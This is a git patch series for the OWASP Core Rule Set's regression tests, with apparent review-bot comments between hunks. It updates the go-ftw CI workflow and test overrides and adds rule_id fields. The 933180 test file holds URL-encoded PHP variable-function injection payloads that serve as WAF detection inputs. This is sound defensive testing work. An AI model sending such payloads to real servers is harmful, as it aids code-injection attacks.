From: Max Leske <250711+theseion@users.noreply.github.com>
Date: Sat, 1 Jun 2024 18:08:46 +0200
Subject: [PATCH 11/18] chore: update workflow for go-ftw v1.0.1
---
 .github/workflows/test.yml | 16 +++++++++++-----
 1 file changed, 11 insertions(+), 5 deletions(-)
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 72c42f930..647427c4b 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -16,7 +16,7 @@ on:
 # Pin tool versions to prevent problems
 env:
- GO_FTW_VERSION: '0.6.4'
+ GO_FTW_VERSION: '1.0.1'
 jobs:
 regression:
@@ -36,16 +36,22 @@ jobs: -p "ftw_${{ env.GO_FTW_VERSION }}_linux_amd64.tar.gz" -O - | tar -xzvf - ftw - name: "Run tests for ${{ matrix.modsec_version }}" - env: - FTW_LOGFILE: './tests/logs/${{ matrix.modsec_version }}/error.log' run: | mkdir -p "tests/logs/${{ matrix.modsec_version }}/{nginx,apache2}" chmod -R o+rw "tests/logs" docker-compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}" docker-compose -f ./tests/docker-compose.yml logs - [ "$(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}')" = "true" ] + if ! [ "$(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}')" = "true" ]; then + echo "Web server failed to start. Aborting." + exit 1 + fi + ./ftw check -d tests/regression/tests - ./ftw run -d tests/regression/tests --show-failures-only + ./ftw run \ + -d tests/regression/tests \ + --log-file "tests/logs/${{ matrix.modsec_version }}/error.log" \ + --overrides tests/regression/httpd-overrides.yaml \ + --show-failures-only - name: "Change permissions if failed" if: failure() From a5f47967a2517c0bce776b49429e692dc9f85261 Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Fri, 14 Jun 2024 18:21:01 +0200 Subject: [PATCH 12/18] chore: update to go-ftw v1.0.2 --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 647427c4b..f8c201c22 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -16,7 +16,7 @@ on: # Pin tool versions to prevent problems env: - GO_FTW_VERSION: '1.0.1' + GO_FTW_VERSION: '1.0.2' jobs: regression: From dda2f1a2537a1d37fce6994852105d09814191bf Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Mon, 17 Jun 2024 20:31:04 +0200 Subject: [PATCH 13/18] chore: fix typo --- tests/regression/nginx-overrides.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
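Review bot: `--overrides tests/regression/httpd-overrides.yaml` is passed for every `matrix.modsec_version` entry, yet the first commit in this series adds a separate `tests/regression/nginx-overrides.yaml`; if the matrix includes an nginx-backed variant (the `mkdir` line naming both `nginx` and `apache2` suggests it does), that variant runs with httpd expectations and its platform-specific overrides are never applied. Deriving the file from a per-entry matrix value would keep the two in step, e.g. `--overrides "tests/regression/${{ matrix.overrides }}"` with a matching key added to the matrix (key name illustrative — the matrix definition is outside this hunk). Separately, the unchanged `mkdir -p "tests/logs/${{ matrix.modsec_version }}/{nginx,apache2}"` line quotes the braces, so bash does not brace-expand and creates one directory literally named `{nginx,apache2}`; the new `--log-file` path does not depend on it, but it is worth confirming the log mount paths in docker-compose.yml agree with what this step creates.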
diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index 1c40df533..d2b1fe98f 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml @@ -113,7 +113,7 @@ test_overrides: expect_ids: [920620] - rule_id: 930110 test_ids: [7] - reason: "nginx does not strip the dots from the URL (which http apparently does), hence ModSecurity sees them and the rule matches" + reason: "nginx does not strip the dots from the URL (which httpd apparently does), hence ModSecurity sees them and the rule matches" output: log: expect_ids: [930110] From f9e843a1c6252bbe2136ab50f27ec4a7e1caf64b Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Thu, 20 Jun 2024 20:40:17 +0200 Subject: [PATCH 14/18] chore: apply review suggestions --- .../920340.yaml | 2 ++ .../920480.yaml | 12 +++++------ .../933110.yaml | 1 + .../933180.yaml | 20 +++++++++++++++++++ tests/regression/tests/base_positive_rules.py | 2 +- .../tests/positivetest-light.yaml.skeleton | 3 +++ 6 files changed, 33 insertions(+), 7 deletions(-) diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml index 24c669bcf..d4b91f372 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" + description: 920340 should detect requests that have a `Content-Length` header but no `Content-Type` header rule_id: 920340 tests: - test_id: 1 @@ -15,6 +16,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" data: "xy" + method: "POST" autocomplete_headers: false version: "HTTP/1.1" output: 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml index 6999af956..b1ac9650e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml @@ -191,7 +191,7 @@ tests: version: "HTTP/1.1" output: log: - no_expect_ids: [920480] + no_expect_ids: [920480] - test_id: 5 stages: - input: @@ -209,7 +209,7 @@ tests: output: log: no_expect_ids: [920480] - # TODO: this case is not yet handled by 3.1, future work + # TODO: this case is not yet handled by 3.1, future work (https://github.com/coreruleset/coreruleset/issues/3743) # - test_id: 6 # stages: # - input: @@ -260,7 +260,7 @@ tests: output: log: expect_ids: [920480] - # TODO: this test should pass (works with curl), to be researched + # TODO: this test should pass (works with curl), to be researched (https://github.com/coreruleset/coreruleset/issues/3743) # - test_id: 9 # stages: # - input: @@ -277,7 +277,7 @@ tests: # output: # log: # expect_ids: [920480] - # TODO: this test should pass (works with curl), to be researched + # TODO: this test should pass (works with curl), to be researched (https://github.com/coreruleset/coreruleset/issues/3743) # - test_id: 10 # stages: # - input: @@ -310,7 +310,7 @@ tests: output: log: expect_ids: [920480] - # TODO: this case is not yet checked by CRS, future work + # TODO: this case is not yet checked by CRS, future work (https://github.com/coreruleset/coreruleset/issues/3743) # - test_id: 12 # stages: # - input: @@ -327,7 +327,7 @@ tests: # output: # log: # expect_ids: [920480] - # TODO: this case is not yet checked by CRS, future work + # TODO: this case is not yet checked by CRS, future work (https://github.com/coreruleset/coreruleset/issues/3743) # - test_id: 13 # stages: # - input: 
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml index ed0a6b4b9..edcc2c582 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml @@ -1,6 +1,7 @@ --- meta: author: "lifeforms, azurit" +rule_id: 9333110 tests: - test_id: 1 desc: PHP no file upload diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index b93c8ba6e..380694bd4 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml @@ -1,6 +1,7 @@ --- meta: author: "lifeforms, azurit" +rule_id: 933180 tests: - test_id: 1 desc: PHP variable functions @@ -28,6 +29,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24a%281%29' version: "HTTP/1.1" @@ -44,6 +46,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24%24b%282%29' version: "HTTP/1.1" @@ -60,6 +63,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24_%283%29' version: "HTTP/1.1" @@ -76,6 +80,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%40%24__%5Bo%5D%284%29' version: "HTTP/1.1" 
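Review bot: `rule_id: 9333110` added to 933110.yaml has an extra `3`; the file is `933110.yaml`, so the line should read `rule_id: 933110`. The override files in this series are keyed by `rule_id` (see `- rule_id: 930110` / `test_ids: [7]` in the nginx-overrides hunk above), so a mistyped id would silently detach every override for this rule and the affected tests would run with their unmodified expectations. The `rule_id: 933180` added to 933180.yaml in the same commit is correct.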
@@ -92,6 +97,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24__%5B%27o%27%5D%285%29' version: "HTTP/1.1" @@ -108,6 +114,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24__%5B%40o%5D%286%29' version: "HTTP/1.1" @@ -124,6 +131,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' version: "HTTP/1.1" @@ -140,6 +148,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24__%5B%40%24c%5D%288%29' version: "HTTP/1.1" @@ -156,6 +165,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: '%24d%5B%27o%27%5D%289%29' version: "HTTP/1.1" @@ -172,6 +182,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24%7B%40a%7D%2810%29' version: "HTTP/1.1" @@ -220,6 +231,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' version: "HTTP/1.1" 
@@ -236,6 +248,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' version: "HTTP/1.1" @@ -252,6 +265,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'c=%24OOO000000%7B0%7D%2815%29' version: "HTTP/1.1" @@ -300,6 +314,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' version: "HTTP/1.1" @@ -316,6 +331,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' version: "HTTP/1.1" @@ -364,6 +380,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24b374k%3D%40%24s_func%2822%29' version: "HTTP/1.1" @@ -380,6 +397,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24function%0D%0A%20%2823%29' version: "HTTP/1.1" @@ -428,6 +446,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 version: "HTTP/1.1" 
@@ -556,6 +575,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: '%24foo-%3E%24funcname%28%29' version: "HTTP/1.1" diff --git a/tests/regression/tests/base_positive_rules.py b/tests/regression/tests/base_positive_rules.py index 9400d085c..a9fafe931 100755 --- a/tests/regression/tests/base_positive_rules.py +++ b/tests/regression/tests/base_positive_rules.py @@ -17,7 +17,7 @@ skeletontest=0 Meta='''--- meta: - author: "spartantri" name: "skeletonid.yaml" + author: "spartantri" description: "Positive tests for rule skeletonid" tests: ''' diff --git a/tests/regression/tests/positivetest-light.yaml.skeleton b/tests/regression/tests/positivetest-light.yaml.skeleton index 408ddceb9..ab0842f9f 100644 --- a/tests/regression/tests/positivetest-light.yaml.skeleton +++ b/tests/regression/tests/positivetest-light.yaml.skeleton @@ -34,6 +34,7 @@ Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" method: "POST" + uri: / version: "HTTP/1.0" data: "skeletonkeyword=test" output: @@ -78,6 +79,7 @@ Content-Type: "skeletondefaultcontenttype" Cookie: skeletonkeyword=test method: "POST" + uri: / version: "HTTP/1.0" data: "test=value" output: @@ -121,6 +123,7 @@ Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" + uri: / version: "HTTP/1.0" data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" output: From 0a90b76f4166612bb6e28e991cbe21ad4b0ba1b2 Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Thu, 20 Jun 2024 21:39:49 +0200 Subject: [PATCH 15/18] chore: handle httpd segfaults --- tests/regression/httpd-overrides.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) 
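Review bot: The `Meta` template in base_positive_rules.py still emits only `name`, `author` and `description` under `meta:`, so generated test files will lack the `rule_id` field that this series adds to the hand-written tests (the final commit's subject is "add `rule_id` field to all tests"). If the harness requires `rule_id` (presumably, given that commit), the generator should emit it too, e.g. a `  rule_id: skeletonid` line after `description:` in the `Meta` string, substituted the same way as `name`. Whether `skeletonid` is replaced elsewhere in this script before the YAML is written is outside this hunk.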
diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml index 8e39a7abc..3bc22d58f 100644 --- a/tests/regression/httpd-overrides.yaml +++ b/tests/regression/httpd-overrides.yaml @@ -14,9 +14,9 @@ test_overrides: no_expect_ids: [920360] - rule_id: 920370 test_ids: [1] - reason: Exceeds PCRE limits + reason: Exceeds PCRE limits, currently segfaults on the CI output: - status: 200 + expect_error: true log: no_expect_ids: [920360] - rule_id: 920380 @@ -28,8 +28,8 @@ test_overrides: no_expect_ids: [920280] - rule_id: 920390 test_ids: [1] - reason: Exceeds PCRE limits + reason: Exceeds PCRE limits, currently segfaults on the CI output: - status: 200 + expect_error: true log: no_expect_ids: [920390] From 6567ca2765ec19b2afe4879f87f3ce92600774b9 Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Thu, 20 Jun 2024 21:52:11 +0200 Subject: [PATCH 16/18] chore: override bad test 920370 --- tests/regression/httpd-overrides.yaml | 8 ++++---- .../tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml | 1 + 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml index 3bc22d58f..19c3a957e 100644 --- a/tests/regression/httpd-overrides.yaml +++ b/tests/regression/httpd-overrides.yaml @@ -14,18 +14,18 @@ test_overrides: no_expect_ids: [920360] - rule_id: 920370 test_ids: [1] - reason: Exceeds PCRE limits, currently segfaults on the CI + reason: Doesn't trigger. Needs to be fixed (https://github.com/coreruleset/coreruleset/issues/3745) output: - expect_error: true + status: 200 log: - no_expect_ids: [920360] + no_expect_ids: [920370] - rule_id: 920380 test_ids: [1] reason: Requires MAX_NUM_ARGS to be set to a sufficiently low value output: status: 200 log: - no_expect_ids: [920280] + no_expect_ids: [920380] - rule_id: 920390 test_ids: [1] reason: Exceeds PCRE limits, currently segfaults on the CI 
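Review bot: The `920390` entry at the end of this hunk keeps `reason: Exceeds PCRE limits, currently segfaults on the CI` together with the `expect_error: true` introduced in the previous commit but, unlike the `920370` entry just above, carries no tracking reference, so a crash of the server under test becomes a permanently expected outcome with nothing pointing back to it. A request that reliably crashes the WAF-fronted server is an availability concern in its own right, and the override should at least link the issue the same way, e.g. `reason: Exceeds PCRE limits, currently segfaults on the CI (<issue URL placeholder>)`. Note also that `expect_error: true` is combined with `log: no_expect_ids: [920390]`; if go-ftw short-circuits on an expected error, the log assertion may never be evaluated — worth confirming against the tool's semantics.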
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml index f1f04baa6..e7011333c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml @@ -1,6 +1,7 @@ --- meta: author: csanders-git + # Needs to be fixed: https://github.com/coreruleset/coreruleset/issues/3745 # PCRE limits need to be set higher to process this rule_id: 920370 tests: From c6816dda37b05115d67308e1896cf98b27310192 Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Sat, 22 Jun 2024 07:52:14 +0200 Subject: [PATCH 17/18] chore: update to go-ftw v1.0.3 --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index f8c201c22..7bfb86101 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -16,7 +16,7 @@ on: # Pin tool versions to prevent problems env: - GO_FTW_VERSION: '1.0.2' + GO_FTW_VERSION: '1.0.3' jobs: regression: From c8d3f520773c4e21d56493a39086e51adcc74484 Mon Sep 17 00:00:00 2001 
From: Max Leske <250711+theseion@users.noreply.github.com> Date: Sat, 22 Jun 2024 08:16:00 +0200 Subject: [PATCH 18/18] fix: add `rule_id` field to all tests --- .../regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml | 1 + .../tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml | 1 + .../tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml | 1 + tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml | 3 ++- tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml | 1 + .../tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml | 1 + .../tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml | 1 + .../tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml | 1 + .../tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml | 1 + .../tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml | 1 + .../tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml | 1 + .../tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml | 1 + .../tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml | 1 + .../tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml | 1 + .../tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml | 1 + .../tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml | 1 + .../tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml 
| 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml | 3 ++- .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml | 2 +- .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml | 1 + 56 files changed, 58 insertions(+), 3 deletions(-) diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml index 9dd14be72..f7ec8046b 100644 
--- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml +++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 913100 tests: - test_id: 1 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml index 74db85b94..b5754ad85 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 920300 tests: - test_id: 1 desc: Request Missing an Accept Header (920300) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml index 48cf6f7a5..dd1131aad 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 920440 tests: - test_id: 1 desc: URL file extension is restricted by policy (920440) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml index ed8449861..f023b6a35 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" +rule_id: 921110 tests: - test_id: 1 desc: "HTTP Response Splitting" 
@@ -102,7 +103,7 @@ tests: Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" User-Agent: "OWASP CRS test agent" Content-Type: text/plain - Content-Length: 36 + Content-Length: "36" method: POST port: 80 uri: "/" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 54f63b364..57318cbb9 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" +rule_id: 921130 tests: - test_id: 1 desc: HTTP response splitting (921130) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml index 084806527..46ab1697e 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 930120 tests: - test_id: 1 desc: Remote File Access Attempt (930120) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml index 6eda72ce1..821b89275 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml @@ -1,6 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" +rule_id: 930121 tests: - test_id: 1 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml index fe62f3a92..795b312ab 100644 
